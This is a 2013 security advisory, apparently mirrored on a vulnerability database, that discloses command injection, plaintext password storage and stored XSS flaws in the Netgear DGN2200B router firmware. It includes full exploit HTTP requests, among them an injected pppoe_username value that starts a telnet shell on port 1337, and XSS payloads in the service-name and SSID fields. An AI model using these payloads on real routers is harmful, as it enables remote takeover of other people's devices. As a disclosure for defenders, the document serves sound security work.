Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Netgear DGN2200B Command Execution / Cross Site Scripting

🗓️ 18 Feb 2013 00:00:00Reported by Michael MessnerType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 22 Views

Netgear DGN2200B Command Execution / XSS Vulnerabilit

Code
`Device Name: DGN2200B  
Vendor: Netgear   
  
============ Vulnerable Firmware Releases: ============   
  
Hardwareversion DGN2200B  
Firmwareversion V1.0.0.36_7.0.36 - 04/01/2011  
  
============ Device Description: ============   
  
Infos: http://www.netgear.com/home/products/wirelessrouters/work-and-play/dgn2200.aspx  
http://www.netgear.de/products/home/wireless_routers/work-and-play/DGN2200B.aspx#  
  
Firmware download: http://kb.netgear.com/app/answers/detail/a_id/18990/~/dgn2200%2Fdgn2200b-firmware-version-1.0.0.36  
  
============ Shodan Torks ============   
  
Shodan Search: NETGEAR DGN2200  
  
============ Vulnerability Overview: ============   
  
* OS Command Injection in the PPOE configuration:  
  
The vulnerability is caused by missing input validation in the pppoe_username parameter and can be exploited to inject and execute arbitrary shell commands. It is possible to upload and execute a backdoor to compromise the device.  
  
Param: pppoe_username  
  
Example Request:  
POST /pppoe.cgi HTTP/1.1  
Host: 192.168.0.1  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Proxy-Connection: keep-alive  
Referer: http://192.168.0.1/BAS_pppoe.htm  
Cookie: uid=vjkqK779eJ  
Authorization: Basic xxxxx=  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 593  
Connection: close  
  
login_type=PPPoE%28PPP+over+Ethernet%29&pppoe_username=%26%20ping%20-c%201%20192%2e168%2e0%2e2%20%26&pppoe_passwd=69cw20hb&pppoe_servicename=&pppoe_dod=1&pppoe_idletime=5&WANAssign=Dynamic&DNSAssign=0&en_nat=1&MACAssign=0&apply=%C3%9Cbernehmen&runtest=yes&wan_ipaddr=0.0.0.0&pppoe_localip=0.0.0.0&wan_dns_sel=0&wan_dns1_pri=0.0.0.0&wan_dns1_sec=...&wan_hwaddr_sel=0&wan_hwaddr_def=84%3A1B%3A5E%3A01%3AE7%3A05&wan_hwaddr2=84%3A1B%3A5E%3A01%3AE7%3A05&wan_hwaddr_pc=5C%3A26%3A0A%3A2B%3AF0%3A3F&wan_nat=1&opendns_parental_ctrl=0&pppoe_flet_sel=&pppoe_flet_type=&pppoe_temp=&opendns_parental_ctrl=0  
  
=> wait around 30 seconds till the configuration is saved and activated  
  
start telnetd on port 1337:  
%26%20telnetd -p 1337%20%26  
  
Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/DGN2200B-OS-Command-Injection-Telnetd-started.png  
  
* Insecure Cryptographic Storage:  
  
There is no password hashing implemented and so it is saved in plain text on the system:  
  
~ # cat /etc/passwd  
nobody:*:0:0:nobody:/:/bin/sh  
admin:password:0:0:admin:/:/bin/sh  
guest:guest:0:0:guest:/:/bin/sh  
~ #  
  
* stored XSS  
  
Injecting scripts into the parameter DomainName mode reveals that this parameter is not properly validated for malicious input. You need to be authenticated or you have to find other methods for inserting the malicious JavaScript code.  
  
-> Zugriffsbeschränkungen -> Dienste -> neuen Dienst anlegen -> Dienstname  
  
Param: userdefined  
  
Original request:  
POST /fw_serv_add.cgi HTTP/1.1  
Host: 192.168.0.1  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Proxy-Connection: keep-alive  
Referer: http://192.168.0.1/fw_serv.cgi  
Cookie: uid=vjkqK779eJ  
Authorization: Basic xxxx=  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 114  
  
userdefined="><img src="0" onerror=alert(1)>&protocol=TCP&portstart=1&portend=5&apply=%C3%9Cbernehmen&which_mode=0  
  
You could also change the request method to HTTP GET:  
http://192.168.0.1/fw_serv_add.cgi?userdefined="><img%20src="0"%20onerror=alert(1)>&protocol=TCP&portstart=1&portend=5&apply=%C3%9Cbernehmen&which_mode=0  
  
The scriptcode gets executed if you try to edit this service again.  
  
Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/DGN2200B-Stored-XSS-Dienste.png  
  
* stored XSS:  
  
Injecting scripts into the parameter ssid mode reveals that this parameter is not properly validated for malicious input. You need to be authenticated or you have to find other methods for inserting the malicious JavaScript code.  
  
-> Wireless-Konfiguration -> Netzwerkname (SSID)  
  
Param: ssid  
  
POST /wlg_sec_profile_main.cgi HTTP/1.1  
Host: 192.168.0.1  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Proxy-Connection: keep-alive  
Referer: http://192.168.0.1/WLG_wireless2_2.htm  
Cookie: uid=vjkqK779eJ  
Authorization: Basic xxxx=  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 328  
  
ssidSelect=1&ssid=%2522%253E%253Cscript%253Ealert%25281%2529%253&WRegion=5&w_channel=0&opmode=20n&enable_ap=1&enable_ssid_bc=1&security_type=AUTO-PSK&passphrase=friendlytrain824&Apply=%C3%9Cbernehmen&tempSetting=0&tempRegion=5&initChannel=0&h_opmode=20n&wds_enable=0&ver_type=WW&pfChanged=0&ssid_sel_submit=0&secure_sel_submit=0  
  
============ Solution ============  
  
No known solution available.  
  
============ Credits ============  
  
The vulnerability was discovered by Michael Messner  
Mail: devnull#at#s3cur1ty#dot#de  
http://www.s3cur1ty.de/m1adv2013-015  
Twitter: @s3cur1ty_de  
  
============ Time Line: ============  
  
17.12.2012 - discovered vulnerability  
18.12.2012 - Privately reported all details to vendor  
18.12.2012 - vendor responded that they will check the reported vulnerability details  
29.01.2013 - vendor contacted me to test a new firmware  
29.01.2013 - /me responded that I need more details about the fixes before I will test the new firmware  
30.01.2013 - vendor reponded that I should just check it  
31.01.2013 - /me responded that I will not check the firmware if they do not provide more details (do not waste my time again!)  
11.02.2013 - vendor responded that he has to declare it internally  
15.02.2013 - public release  
  
===================== Advisory end =====================  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
18 Feb 2013 00:00Current
0.1Low risk
Vulners AI Score0.1
netgeardgn2200bcommand injectioncross site scriptingfirmware vulnerabilitycryptographic storagexssinput validation
22